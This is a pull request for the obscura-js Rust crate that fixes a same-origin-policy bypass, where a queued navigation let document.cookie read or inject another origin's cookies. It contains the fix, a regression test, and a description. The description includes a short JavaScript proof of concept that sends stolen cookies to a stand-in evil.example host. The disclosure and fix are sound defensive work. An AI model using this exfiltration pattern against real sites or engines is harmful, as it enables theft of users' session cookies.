### PR TITLE
fix(obscura-js): don't move the document URL before navigation commits (#940)

### DIFF
--- a/crates/obscura-js/src/ops.rs
+++ b/crates/obscura-js/src/ops.rs
@@ -3935,7 +3935,11 @@ fn op_navigate(
 ) {
     let gs = realm_state(scope, state);
     let mut gs = gs.borrow_mut();
-    gs.url = url.to_string();
+    // Only queue the navigation — do NOT change the realm URL here. The URL is
+    // updated on commit via `set_url` once the navigation is actually performed.
+    // Moving it early let synchronous JS run between two navigations read and
+    // write another origin's cookies through document.cookie, whose ops derive
+    // the cookie domain from this URL (SOP bypass, #940).
     gs.pending_navigation = Some((url.to_string(), method.to_string(), body.to_string()));
 }
 

--- a/crates/obscura-js/src/runtime.rs
+++ b/crates/obscura-js/src/runtime.rs
@@ -15468,6 +15468,30 @@ mod tests {
         );
     }
 
+    // #940: op_navigate must not move the document's cookie context before the
+    // navigation actually commits. A queued navigation to another origin must
+    // not let document.cookie read that origin's cookies (SOP bypass).
+    #[test]
+    fn queued_navigation_does_not_expose_another_origins_cookies() {
+        let (mut rt, jar) = setup_runtime_with_cookies("<html><body></body></html>");
+        // A cookie belonging to a different origin than the current page
+        // (the harness page is http://example.com/test).
+        let victim = url::Url::parse("https://victim.example/").unwrap();
+        jar.set_cookie("secret=victimtoken; Path=/", &victim);
+
+        // Start navigating to the victim origin. This only *queues* the
+        // navigation; it must not retroactively move the cookie context.
+        rt.evaluate("location.href = 'https://victim.example/'").unwrap();
+
+        let result = rt.evaluate("document.cookie").unwrap();
+        let cookie_str = result.as_str().unwrap();
+        assert!(
+            !cookie_str.contains("victimtoken"),
+            "document.cookie must not expose another origin's cookies after a queued navigation, got: {}",
+            cookie_str
+        );
+    }
+
     #[test]
     fn test_document_cookie_delete_via_max_age() {
         let (mut rt, jar) = setup_runtime_with_cookies("<html><body></body></html>");


### PR DESCRIPTION
## What & why

`op_navigate` — the op behind `location.href = …`, `location.assign()`, `location.replace()`, and form submission — set the realm's URL (`gs.url`) to the target **immediately**, before the navigation was actually performed. But `op_get_cookies` / `op_set_cookie` (the `document.cookie` getter/setter) derive the cookie domain from `gs.url`, and the navigation is only *queued* (`pending_navigation`) and pumped later by the host. So synchronous JS between two navigations bound `document.cookie` to a **different origin's** jar:

```js
// page is https://evil.example
location.href = "https://victim.example";              // gs.url := victim (not navigated yet)
const stolen = document.cookie;                         // reads victim's non-HttpOnly cookies
location.href = "https://evil.example/x?c=" + encodeURIComponent(stolen);
// the 2nd op_navigate overwrites pending_navigation; only the exfil URL is visited
```

This let a page **read another origin's non-HttpOnly cookies** and **inject cookies into another origin's jar** (fixation) — a same-origin-policy bypass. (HttpOnly cookies remain unreadable via the existing `get_js_visible_cookies` filter, but non-HttpOnly cookies leak and injection is unaffected.)

Closes #940.

## Fix

`op_navigate` now only queues the pending navigation and no longer mutates `gs.url` (a one-line removal). The realm URL is already set on commit via `ObscuraJsRuntime::set_url` once the navigation is performed — which also matches browser semantics: `location.href` does not change until the navigation commits.

## Tests

TDD RED→GREEN. New test `queued_navigation_does_not_expose_another_origins_cookies`: with a cookie seeded for `https://victim.example` and the page at `http://example.com`, a queued `location.href = "https://victim.example/"` must not make `document.cookie` reveal the victim cookie.

Verified RED first — the test caught the live leak (`document.cookie` returned `secret=victimtoken`) — then GREEN. Full `obscura-js` suite: **399 passed, 0 failed** (nothing relied on the old immediate-URL behavior).

https://claude.ai/code/session_01W4C7V9e3rXKRY8jn1rYCoY
